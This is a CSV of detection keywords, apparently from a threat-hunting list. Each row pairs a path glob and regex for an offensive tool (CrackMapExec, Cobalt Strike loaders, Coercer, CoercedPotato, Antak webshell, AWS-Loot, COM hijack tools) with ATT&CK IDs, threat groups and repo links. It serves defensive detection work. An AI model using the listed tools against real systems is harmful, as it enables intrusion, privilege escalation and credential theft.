"*/cmedb",".{0,1000}\/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/CMLoot.git*",".{0,1000}\/CMLoot\.git.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*/CMLoot.ps1*",".{0,1000}\/CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*/CMSeek*",".{0,1000}\/CMSeek.{0,1000}","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2210","501","2024-04-09T13:40:52Z","2018-06-14T00:15:51Z" "*/Cn33liz*",".{0,1000}\/Cn33liz.{0,1000}","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. 
known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cna/pipetest.cna*",".{0,1000}\/cna\/pipetest\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*/Cneelis*",".{0,1000}\/Cneelis.{0,1000}","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. 
known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://twitter.com/Cneelis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/co2-cewler/*",".{0,1000}\/co2\-cewler\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-core/*",".{0,1000}\/co2\-core\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-laudanum/*",".{0,1000}\/co2\-laudanum\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-sqlmapper/*",".{0,1000}\/co2\-sqlmapper\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" 
"*/coap-resources.nse*",".{0,1000}\/coap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cobaltclip.c*",".{0,1000}\/cobaltclip\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/cobaltclip.o*",".{0,1000}\/cobaltclip\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/Cobalt-Clip/*",".{0,1000}\/Cobalt\-Clip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/cobaltstrike*",".{0,1000}\/cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobalt-strike*",".{0,1000}\/cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobaltstrike/c2lint*",".{0,1000}\/cobaltstrike\/c2lint.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/cobaltstrike-nemesis-connector/*",".{0,1000}\/cobaltstrike\-nemesis\-connector\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/code_exec.ps1*",".{0,1000}\/code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/CodeBuildLooter.py*",".{0,1000}\/CodeBuildLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/CoercedPotato.cpp*",".{0,1000}\/CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*/CoercedPotato.git*",".{0,1000}\/CoercedPotato\.git.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*/CoercedPotatoRDLL.git*",".{0,1000}\/CoercedPotatoRDLL\.git.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*/coercer.egg-info*",".{0,1000}\/coercer\.egg\-info.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer.git*",".{0,1000}\/Coercer\.git.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer.py*",".{0,1000}\/Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer/*.py",".{0,1000}\/Coercer\/.{0,1000}\.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/coercer_output_*.txt*",".{0,1000}\/coercer_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/CoffeeLdr.c*",".{0,1000}\/CoffeeLdr\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*/CoffeeLdr/*",".{0,1000}\/CoffeeLdr\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*/COFFLoader*",".{0,1000}\/COFFLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/COFFLoader.exe*",".{0,1000}\/COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/COFFLoader2/*",".{0,1000}\/COFFLoader2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*/collection/screengrab*",".{0,1000}\/collection\/screengrab.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/com/blackh4t/*",".{0,1000}\/com\/blackh4t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/combine_harvester.git*",".{0,1000}\/combine_harvester\.git.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*/comfoo.profile*",".{0,1000}\/comfoo\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. 
This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/COMHijackToolkit.ps1*",".{0,1000}\/COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/COM-Hunter.csproj*",".{0,1000}\/COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" 
